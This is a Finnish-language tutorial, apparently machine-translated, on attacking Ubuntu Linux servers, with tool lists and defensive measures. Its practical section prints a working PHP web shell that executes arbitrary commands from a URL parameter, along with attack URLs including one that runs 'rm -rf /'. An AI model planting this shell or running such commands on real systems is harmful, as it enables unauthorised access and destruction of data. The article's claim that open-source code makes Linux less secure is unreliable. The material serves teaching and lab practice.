Linux-käyttöjärjestelmän hakkerointi: Hakkerointi Ubuntu (Komennot opetusohjelma)
Linux on eniten käytetty palvelinkäyttöjärjestelmä, erityisesti web-palvelimille. Se on avoimen lähdekoodin; tämä tarkoittaa, että kuka tahansa voi päästä käsiksi lähdekoodiin. Tämä tekee siitä vähemmän turvallista verrattuna muihin käyttöjärjestelmiin, koska hyökkääjät voivat tutkia lähdekoodia löytääkseen haavoittuvuuksia. Linux for Hackers on kyse näiden haavoittuvuuksien hyödyntämisestä luvattoman pääsyn saamiseksi järjestelmään.
Tässä artikkelissa esittelemme sinulle mitä Linux on, sen tietoturva-aukkoja ja hakkerointia Ubuntu ja vastatoimenpiteet, jotka voit ottaa käyttöön.
Pikahuomautus Linuxissa
Linux on avoimen lähdekoodin käyttöjärjestelmä. Linux-pohjaisia käyttöjärjestelmiä on monia jakeluja, kuten Redhat, Fedora ja Ubuntu, jne. Toisin kuin muut käyttöjärjestelmät, Linux on vähemmän turvallinen turvallisuuden suhteen. Tämä johtuu siitä, että lähdekoodi on vapaasti saatavilla, joten sen haavoittuvuuksien tutkiminen ja niiden hyödyntäminen on helppoa verrattuna muihin käyttöjärjestelmiin, jotka eivät ole avoimen lähdekoodin. Linuxia voidaan käyttää palvelimena, työpöydän, tabletin tai mobiililaitteen käyttöjärjestelmänä.
Linux-ohjelmia voidaan käyttää joko graafisella käyttöliittymällä tai komentoilla. Linux-komennot for Kali Linux hakkerointi on tehokkaampaa ja tehokkaampaa verrattuna graafisen käyttöliittymän käyttöön. Tästä syystä on hyödyllistä tietää Linuxin peruskomennot hakkerointia varten.
Katso nämä opetusohjelmat https://www.guru99.com/unix-linux-tutorial.html miten pääset alkuun Kali Linux hakata.
Linuxin hakkerointityökalut
- Nessus– tätä työkalua voidaan käyttää Ubuntu hakkerointi, skannausasetukset, korjaustiedostot ja verkot jne. löydät osoitteesta https://www.tenable.com/products/nessus
- NMap. Tämän työkalun avulla voidaan valvoa palvelimella käynnissä olevia isäntiä ja niiden käyttämiä palveluita. Sitä voidaan käyttää myös porttien etsimiseen. Se löytyy osoitteesta https://nmap.org/
- SARA – SARA on lyhenne sanoista Security Auditor's Research Assistant. Kuten nimestä voi päätellä, tätä työkalua voidaan käyttää verkkojen tarkastamiseen uhkia vastaan, kuten SQL Injection, XSS jne. se löytyy osoitteesta http://www-arc.com/sara/sara.html
Yllä oleva luettelo ei ole tyhjentävä; se antaa sinulle käsityksen käytettävissä olevista työkaluista Ubuntu Linux-järjestelmien hakkerointi ja hakkerointi.
Kuinka estää Linux-hakkerointi
Linux Hacking hyödyntää käyttöjärjestelmän haavoittuvuuksia. Organisaatio voi suojautuakseen tällaisilta hyökkäyksiltä seuraavan käytännön mukaisesti.
- Patch-hallinta– Korjaukset korjaavat bugeja, joita hyökkääjät käyttävät hyväkseen vaarantaakseen järjestelmän. Hyvä korjaustiedostojen hallintakäytäntö varmistaa, että käytät jatkuvasti asiaankuuluvia korjaustiedostoja järjestelmääsi.
- Oikea käyttöjärjestelmän kokoonpano– muut hyväksikäytöt hyödyntävät palvelimen kokoonpanon heikkouksia. Ei-aktiiviset käyttäjänimet ja demonit tulee poistaa käytöstä. Oletusasetukset, kuten sovelluksen yleiset salasanat, oletuskäyttäjänimet ja jotkut porttinumerot, tulee muuttaa.
- Intrusion Detection System– Tällaisten työkalujen avulla voidaan havaita luvaton pääsy järjestelmään. Jotkut työkalut pystyvät havaitsemaan ja estämään tällaiset hyökkäykset.
Hakkerointitoiminta: Hakkerointi a Ubuntu Linux-järjestelmä PHP:llä
Tässä käytännön tilanteessa opimme hakkeroimaan Ubuntu ja annamme sinulle perustiedot siitä, miten voit käyttää PHP vaarantaa Linuxin. Emme aio kohdistaa uhreja. Jos haluat kokeilla sitä, voit asentaa LAMPP:n paikalliselle koneellesi.
PHP sisältää kaksi toimintoa, joita voidaan käyttää Linuxin hakkerointikomentojen suorittamiseen. Siinä on exec()- ja shell_exec()-funktiot. Funktio exec() palauttaa komennon tulosteen viimeisen rivin, kun taas shell_exec() palauttaa komennon koko tuloksen merkkijonona.
Esittelytarkoituksessa oletetaan, että hyökkääjien johtajat lataavat seuraavan tiedoston verkkopalvelimelle.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
TÄSSÄ,
Yllä oleva komentosarja saa komennon GET-muuttujasta nimeltä cmd. Komento suoritetaan komennolla shell_exec() ja tulokset palautetaan selaimeen.
Yllä olevaa koodia voidaan hyödyntää käyttämällä seuraavaa URL-osoitetta
http://localhost/cp/konsole.php?cmd=ls%20-l
TÄSSÄ,
- "…konsole.php?cmd=ls%20-l"antaa arvon ls –l muuttujalle cmd.
Käsky sisään Ubuntu palvelinta vastaan hakkerointi suoritetaan muodossa
shell_exec('ls -l') ;
Yllä olevan koodin suorittaminen verkkopalvelimella antaa seuraavanlaisia tuloksia.
Yllä oleva komento näyttää yksinkertaisesti nykyisen hakemiston tiedostot ja käyttöoikeudet
Oletetaan, että hyökkääjä välittää seuraavan komennon
rm -rf /
TÄSSÄ,
- "rm" poistaa tiedostot
- "rf" saa rm-komennon suoritetuksi rekursiivisessa tilassa. Kaikkien kansioiden ja tiedostojen poistaminen
- "/" kehottaa komentoa aloittamaan tiedostojen poistamisen juurihakemistosta
Hyökkäys-URL näyttäisi suunnilleen tältä
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Yhteenveto
- Linux on suosittu käyttöjärjestelmä palvelimille, pöytäkoneille, tableteille ja mobiililaitteille.
- Linux on avoin lähdekoodi, ja lähdekoodin voi hankkia kuka tahansa. Näin haavoittuvuudet on helppo havaita. Se on yksi parhaista käyttöjärjestelmistä hakkereille.
- Perus- ja verkkohakkerointikomennot sisään Ubuntu ovat arvokkaita Linux-hakkereille.
- Haavoittuvuudet ovat heikkous, jota voidaan hyödyntää järjestelmän vaarantamiseen.
- Hyvä tietoturva voi auttaa suojaamaan järjestelmää hyökkääjiltä.